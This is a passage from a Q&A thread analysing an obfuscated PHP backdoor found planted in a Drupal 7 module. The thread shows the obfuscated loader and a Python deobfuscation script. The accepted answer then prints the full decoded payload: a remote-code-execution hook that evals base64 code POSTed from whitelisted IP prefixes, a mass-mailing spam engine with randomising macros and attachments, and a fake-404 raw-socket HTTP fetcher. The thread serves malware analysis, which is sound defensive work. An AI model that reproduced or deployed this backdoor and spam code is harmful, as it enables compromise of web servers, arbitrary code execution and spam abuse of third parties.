'YgGjYGPjYgGjYgGjYB2zSgGObB1We7rM7WUV9RmP8sldRxGcixGdahcpwgbjSxGObzwNU7wMUgGvixG'.
'O9B14ep3SYgGjYgGjYgGSYgGjYgGjYgkG9dUWHRm2YgjO9dG3KfK2'.
'bRw2bElXCWGnSAkp97LOYfK2bRw2bEljSAFSYgGjYgGjYgGSYgGjYgGjYgGObz'.
'wMYy4jYAYTYgmP971O9RKMYy4jYAYTYgmPRsm2UBw0UBwOYy4j9z13bsaTgAGjYgGjYgGjUstX8BaPYg1G9zwn'.
'9AjO9dGXYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgmW9R5j604jlB9W971OS'.
'gmzbgJj5pGWQgOTYgFIYQBf460mjVgJ46RlngylvVg+46EmjVg'.
'r46EmjAGI6JPjYgGjgAGjYgGjYgGjYgGjYgFIYQgu4eylnVgW46RmjQgD46Gj46El3QgT'.
'460mtcgZ4eFj46ul3QgM46nlnVgW46qlnVgWYQgWYQgD46TlnUBg46RlnUBg46ajSAFSY'.
'gGjYgGjYgGjYgGjH7ePYghjKBtu9Bw497Q497ljKAejbEmWbBcMSgmW9R53YgKbb2NvRfKb8'.
'AYXYp4cmO15a4ajSlPjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGnSAylVcgJ46ilnVgT46Tl3VgD46jj4'.
'eilVVgrYQBk4eulvQBg46ylnUB6Yg4j46qlnVBG4eylVUgD4e6lvQBG4eilVUgFYQgD46TlnUBg46RlnUBgYg'.
'PngAGjYgGjYgGjYgGjYgGjYgGOH1cO9Rm2eEm29gGcYfmWU7aTgAGjYgGjYgGjYg'.
'GjYgGjYgGSYgGjYgGjYgGjYgGjYgGjYgmP971O9RKMYy4jbEwAbEmWSgmW9R53YyG3YfQ4bdknbWjObzwM6gG'.
'ARfKb82NWRBZASxOTgAGjYgGjYgGjYgGjYgGjYgGObzwMYy4jbEwAbEmWSgmW9R53YfQ4bdknbWjObzwM6gGARfKb82NWRBZAS'.
'x34Sp3SYgGjYgGjYgGjYgGjYgGjYGPjYgGjYgGjYgGjYgGjYgGj6WPjxBwt9Bw'.
'WbWk48WkkbdKtoxGI6JPjYgGjYgGjYgGjYgGjYgGjH7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4dHBwt9BwWbWbjufJjKfktbz1Vb'.
'r3dbzw4URKvKr4cixUtbdKtoxbSYgGjYgGjYgGjYgGjYgGjYgGjYgkFugGPHRQM9RlPKfkt'.
'bz1Vbr3dbzwOHRK2eEldRxOjKAejKfktbz1Vbr3dbzwOHRK2eE'.
'ldRp4cUfKr9xOjSlPjYgGjYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgmPYy4j9RtJ8BcO9xjARfKb8AY3Yg'.
'mP971O9RKMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGOHBwt9BwWbWGcYB1Wbz1LSgOTgAGjYgGjYgGjYg'.
'GjYgGjYgGjYgGj9zcW9710HgjjKBjjeR5jKB3ciAmsYgOSYgGjYgGjY'.
'gGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgk'.
'MUfKJ8E5PKfe3YgbDKWOjSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgGOHWGcYfQredQ4bAjOUAJj5gJjbEmWbBcMSgms6gGdCAbXSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjY'.
'gGjYgmsYy4jUfKX8xtMU7KMUfYPKfe3YfQ4bdknbWjOUAJjKMPdSx3NSxOTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgG'.
'jYf4SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjKBt2e7m2bdQ8bEmWUBcrbfk2bAjOHW2UYy4jKfeTgAGjYgGjYgGjYgG'.
'jYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjH7ePYB2Mb'.
'sw4SgmJeRKt8RQ8KEK29B2W97Q4Kr4XYgezYgmJeRKt8RQ8KEK29B2W97Q4Kr4ciRmWU7ajKAejH'.
'RQM9RlPKBt2e7m2bdQ8K4Nil41axacCKr4XYgOSYgGjYgGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgG'.
'jYgGjYgGjYgGObB1We7rM7WUrbzJdRxGcYgmP971O9RKM7WU5p4Qkwh2ipAUUCJ'.
'PjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgGtHRQM9RlPKfktbz1Vbr3dbzwOHRK2eEl'.
'Vescr8dldRxOjSxGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUYy4j5y3SYgGjYgG'.
'jYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzwOHRK2eElVescr8dldRpJN5gGXgAGjYgGjYgGjYgGjYgGj'.
'YgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUS'.
'W3TgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgmzU7L0Yy4jRrcBwaLywh2ip2cuCJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgkW9RmrbzZjlB2MRscAHzw0UgjOUBtXbWOjiWGOUBtXbW4+KB9r8'.
'z5PKfktbz1VbWOjCAGO9dwveWjObB1We7rMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgk'.
'cgAGjYgGjYgGjYgGjYgGjYgkcgAGjYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzw4URKvKr4cixUP971O9RKMKWGXYfK2'.
'UfwW8AGOHBwt9BwWbM3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYf4SYgGjYgGjYgGSYgGjYgGjYgkG9zQ38EQ2SgmzbgOTgA'.
'GjYgkcgAGjYgk28fQ2YfK2UfwW8AkBlaNpmp3nSAGO9RKWbEmW6Am2bdKv8M3jSAFSYgGjYGPjYgGjH'.
'7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4deRKWeROdYgOjKfK2bWGcYB1Wbz1LSgUP971O9RKMKM4+KBt2e7'.
'm2bd53YgU08sL497L4KM4+KfK2bWOTgAGjYgGSYgGjYfK2UfwW'.
'8AGObzwMCJXc';
eval(v78ZFAX($vFHLJ89, $vIIJ30Y));?>
```

I believe it was used for sending the spams such us:

```
To: <david.cameron@example.com>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code
```

But how? What's the method of its action?

---

A bit of more background:

It was found in Drupal 7 instance at `sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php`, however the file and code can vary depending on the hack.

One [user](https://gist.github.com/Strae/38e36d0a54f60843dc66) reported it in `sites/all/modules/i18n/i18n_block/stats7.php` and the content of this script was a bit different:

```
<?php
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'.
```

Comment: Usually either sending spam, DoS, or just a basic file browser to upload more malware or attempt to execute shell commands. You're better off looking how this script got there in the first place rather than what it does.

Comment: I've found similar code at this [blog post](http://denik.od.ua/http_request_php_post_get/) and here the `http_request()` at [gist code](https://gist.github.com/Dreamka/193092bb3fccd6d3fe5b).

Comment: No, the idiots who made this piece of garbage just Googled for how to make an HTTP request in PHP and copy/pasted his code.

Comment: [Original version of the related post](http://security.stackexchange.com/questions/72933/php-need-help-to-understand-injected-code)

Comment: Similar PHP exploit scripts were uploaded here for education purposes: [A collection of PHP exploit scripts](https://github.com/mattiasgeniar/php-exploit-scripts).

Comment: This is actually easy to decode, by changing `eval` to `echo`:)

Comment: For anyone willing to decode this very quickly: replace the eval by an echo, and execute the script manually `php that_file.php > decoded.txt`, then open `decoded.txt`. Voila!

Answer (score 29, accepted):

The last line performs an `eval()` of function v78ZFAX() given the two parameters like so:

```
eval(v78ZFAX($vFHLJ89, $vIIJ30Y));
```

That first parameter is the part that takes up the bulk of the code.  It is assigned all that random-looking garbage, with `.` concatenating all those strings together into one long string:

```
$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk' ...
```

The second parameter is this array, which maps certain letters/numbers to other letters/numbers:

```
$vIIJ30Y = Array(
    '1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
```

The function itself can be re-written as this for clarity:

```
function v78ZFAX($vJOJJ7T, $vRJ8WGX)
{
    $vM74216 = ''; 
    for($i=0; $i < strlen($vJOJJ7T); $i++)
    {
        $vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];
    }
    return base64_decode($vM74216);
}
```

It starts by declaring a blank variable `vM74216` and then for each digit of the first variable (the super long one) it adds a character to this currently-blank variable.  The digit it adds depends on the outcome of the ternary condition used by the `isset()` function, which simply checks to see if that i-th digit of the huge number has a corresponding lookup entry in the character mapping array.

At the end of it all, it Base64 decodes the resultant variable, which gets passed as the derived parameter of the initial `eval()` function.

The whole point is obfuscation.  It looks like a jumbled mess, but characters get swapped, concatenated, etc. until its payload is unleashed.  This is done to prevent an analyst from immediately knowing the nature of the script, as well as bypassing signature-based antivirus techniques.

**EDIT**

Using this hack of a Python script (I'm just more comfortable in Python):

```
import base64

TheArray = {'1':'F', '0':'j', '3':'s', '2':'l', '5':'M', '4':'0', '7':'W', '6':'L', '9':'Z', '8':'b', 'A':'i', 'C':'O', 'B':'G', 'E':'3', 'D':'6', 'G':'A', 'F':'8', 'I':'q', 'H':'a', 'K':'J', 'J':'w', 'M':'z', 'L':'5', 'O':'k', 'N':'x', 'Q':'N', 'P':'o', 'S':'K', 'R':'X', 'U':'d', 'T':'7', 'W':'y', 'V':'t', 'Y':'I', 'X':'p', 'Z':'4', 'a':'U', 'c':'9', 'b':'c', 'e':'Y', 'd':'n', 'g':'C', 'f':'H', 'i':'P', 'h':'E', 'k':'B', 'j':'g', 'm':'R', 'l':'Q', 'o':'e', 'n':'v', 'q':'r', 'p':'T', 's':'2', 'r':'1', 'u':'f', 't':'h', 'w':'V', 'v':'u', 'y':'D', 'x':'S', 'z':'m'}

LongVar = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'+'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'+'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'+'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'+'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'+'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'+'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'+'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'+'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'+'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'+'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'+'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'+'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'+'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'+'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'+'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'+'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'+'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'+'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'+'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'+'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'+'t8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'+'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'+'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'+'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'+'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'+'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'+'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'+'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'+'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'+'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.... TRIMMED FOR SE ANSWER CHAR COUNT

NewVar = ''

for i in LongVar:
    if i in TheArray:
        NewVar += TheArray[i]
    else:
        NewVar += i

print base64.b64decode(NewVar)
```

I was able to derive the obfuscated payload as:

```
if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
    eval(base64_decode($_POST["code"]));
    exit();
}

if (isset($_POST["type"]) && $_POST["type"]=="1")
{
    type1_send();
    exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{

}
elseif (isset($_POST["type"]))
{
    echo $_POST["type"];
    exit();
}

error_404();

function is_good_ip($ip)
{
    $goods = Array("6.185.239.", "8.138.118.");

    foreach ($goods as $good)
    {
        if (strstr($ip, $good) != FALSE)
        {
            return TRUE;
        }
    }

    return FALSE;
}

function type1_send()
{
    if(!isset($_POST["emails"])
            OR !isset($_POST["themes"])
            OR !isset($_POST["messages"])
            OR !isset($_POST["froms"])
            OR !isset($_POST["mailers"])
    )
    {
        exit();
    }

    if(get_magic_quotes_gpc())
    {
        foreach($_POST as $key => $post)
        {
            $_POST[$key] = stripcslashes($post);
        }
    }

    $emails = @unserialize(base64_decode($_POST["emails"]));
    $themes = @unserialize(base64_decode($_POST["themes"]));
    $messages = @unserialize(base64_decode($_POST["messages"]));
    $froms = @unserialize(base64_decode($_POST["froms"]));
    $mailers = @unserialize(base64_decode($_POST["mailers"]));
    $aliases = @unserialize(base64_decode($_POST["aliases"]));
    $passes = @unserialize(base64_decode($_POST["passes"]));

    if(isset($_SERVER))
    {
        $_SERVER['PHP_SELF'] = "/"; 
        $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
        }
    }

    if(isset($_FILES))
    {
        foreach($_FILES as $key => $file)
        {
            $filename = alter_macros($aliases[$key]);
            $filename = num_macros($filename);
            $filename = text_macros($filename);
            $filename = xnum_macros($filename);
            $_FILES[$key]["name"] = $filename;
        }
    }

    if(empty($emails))
    {
        exit();
    }

    foreach ($emails as $fteil => $email)
    {
        $theme = $themes[array_rand($themes)];
        $theme = alter_macros($theme["theme"]);
        $theme = num_macros($theme);
        $theme = text_macros($theme);
        $theme = xnum_macros($theme);

        $message = $messages[array_rand($messages)];
        $message = alter_macros($message["message"]);
        $message = num_macros($message);
        $message = text_macros($message);
        $message = xnum_macros($message);
        //$message = pass_macros($message, $passes);
        $message = fteil_macros($message, $fteil);

        $from = $froms[array_rand($froms)];
        $from = alter_macros($from["from"]);
        $from = num_macros($from);
        $from = text_macros($from);
        $from = xnum_macros($from);

        if (strstr($from, "[CUSTOM]") == FALSE)
        {
            $from = from_host($from);
        }
        else
        {
            $from = str_replace("[CUSTOM]", "", $from);
        }

        $mailer = $mailers[array_rand($mailers)];

        send_mail($from, $email, $theme, $message, $mailer);
    }
}

function send_mail($from, $to, $subj, $text, $mailer)
{
    $head = "";

    $un = strtoupper(uniqid(time()));

    $head .= "From: $from\n";
    $head .= "X-Mailer: $mailer\n";
    $head .= "Reply-To: $from\n";

    $head .= "Mime-Version: 1.0\n";
    $head .= "Content-Type: multipart/alternative;";
    $head .= "boundary=\"----------".$un."\"\n\n";

    $plain = strip_tags($text);
    $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";

    $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    $zag .= "------------".$un."--";

    if(count($_FILES) > 0)
    {
        foreach($_FILES as $file)
        {
            if(file_exists($file["tmp_name"]))
            {
                $f = fopen($file["tmp_name"], "rb");
                $zag .= "------------".$un."\n";
                $zag .= "Content-Type: application/octet-stream;";
                $zag .= "name=\"".$file["name"]."\"\n";
                $zag .= "Content-Transfer-Encoding:base64\n";
                $zag .= "Content-Disposition:attachment;";
                $zag .= "filename=\"".$file["name"]."\"\n\n";
                $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                fclose($f);
            }
        }
    }

    if(@mail($to, $subj, $zag, $head))
    {
        if(!empty($_POST['verbose']))
            echo "SENDED";
    }
    else
    {
        if(!empty($_POST['verbose']))
            echo "FAIL";
    }
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}

function text_macros($content)
{
    preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $word = generate_word($rand);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }

    preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $count = $matches[1][$i];

        $word  = generate_word($count);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }


    return $content;
}

function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function generate_word($length)
{
    $chars = 'abcdefghijklmnopqrstuvyxz';
    $numChars = strlen($chars);
    $string = '';
    for($i = 0; $i < $length; $i++)
    {
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function pass_macros($content, $passes)
{
    $pass = array_pop($passes);

    return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
    return str_replace("[FTEIL]", $fteil, $content);
}

function is_ip($str) {
  return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}

function from_host($content)
{

    $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);

    if (is_ip($host))
    {
        return $content;
    }

    $tokens = explode("@", $content);

    $content = $tokens[0] . "@" . $host . ">";

    return $content;
}

function error_404()
{
    header("HTTP/1.1 404 Not Found");

    $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );

    $content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
    $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );

    exit( $content );
}


function custom_http_request1($params)
{
    if( ! is_array($params) )
    {
        $params = array(
            'url' => $params,
            'method' => 'GET'
        );
    }

    if( $params['url']=='' ) return FALSE;

    if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
    $params['method'] = strtoupper($params['method']);
    if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE; 

    /* Приводим ссылку в правильный вид */
    $url = parse_url($params['url']);
    if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
    if( ! isset($url['path']) ) $url['path'] = '/';
    if( ! isset($url['host']) && isset($url['path']) )
    {
        if( strpos($url['path'], '/') )
        {
            $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
            $url['path'] = substr($url['path'], strpos($url['path'], '/'));
        }
        else
        {
            $url['host'] = $url['path'];
            $url['path'] = '/'; 
        }
    }
    $url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
    if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";

    $port = isset($params['port']) ? $params['port']
            : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );

    $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
    if( ! isset($params['return']) ) $params['return'] = 'content';

    $scheme = $url['scheme']=='https' ? 'ssl://':'';
    $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
    if( $fp )
    {
        /* Mozilla */
        if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";

        $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
        $request .= "Host: {$url['host']}\r\n";
        $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
        if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
        if( isset($params['cookie']) )
        {
            $cookie = "";
            if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
            else $cookie = $params['cookie'];
            if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
        }
        $request .= "Connection: close\r\n";
        if( $params['method']=='POST' )
        {
            if( isset($params['data']) && is_array($params['data']) )
            {
                foreach($params['data'] AS $k => $v)
                    $data .= urlencode($k).'='.urlencode($v).'&';
                if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
            }
            $data .= "\r\n\r\n";

            $request .= "Content-type: application/x-www-form-urlencoded\r\n";
            $request .= "Content-length: ".strlen($data)."\r\n";
        }
        $request .= "\r\n";

        if( $params['method'] == 'POST' ) $request .= $data;

        @fwrite ($fp,$request); /* Send request */

        $res = ""; $headers = ""; $h_detected = false;
        while( !@feof($fp) )
        {
            $res .= @fread($fp, 1024); /* читаем контент */

            /* Проверка наличия загловков в контенте */
            if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
            {
                /* заголовки уже считаны - корректируем контент */
                $h_detected = true;

                $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
                $res = substr($res, strpos($res, "\r\n\r\n")+4);

                /* Headers to Array */
                if( $params['return']=='headers' || $params['return']=='array'
                    || (isset($params['redirect']) && $params['redirect']==true) )
                {
                    $h = explode("\r\n", $headers);
                    $headers = array();
                    foreach( $h as $k=>$v )
                    {
                        if( strpos($v, ':') )
                        {
                            $k = substr($v, 0, strpos($v, ':'));
                            $v = trim(substr($v, strpos($v, ':')+1));
                        }
                        $headers[strtoupper($k)] = $v;
                    }
                }
                if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
                {
                    $params['url'] = $headers['LOCATION'];
                    if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
                    if( $params['redirect-count']<10 )
                    {
                        $params['redirect-count']++;
                        $func = __FUNCTION__;
                        return @is_object($this) ? $this->$func($params) : $func($params);
                    }
                }
                if( $params['return']=='headers' ) return $headers;
            }
        }

        @fclose($fp);
    }
    else return FALSE;/* $errstr.$errno; */

    if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);

    return $res;
}
```

It's interesting to see some code comments in Russian.  Google Translate does well for them:
`$res .= @fread($fp, 1024); /* читаем контент */`
"read content"

`/* Проверка наличия загловков в контенте */`
"Check availability of titles in the content"

`/* заголовки уже считаны - корректируем контент */`
"headers already read - adjust content"

Comment: Right, that's the encoding mechanism. But what's the payload?

Comment: Updated my answer.

Comment: Nice, Russian malware. Thank you for deciphering this nasty script:) This seems to be similar/same code as here: [Need help to understand injected code](http://security.stackexchange.com/q/72933/11825).

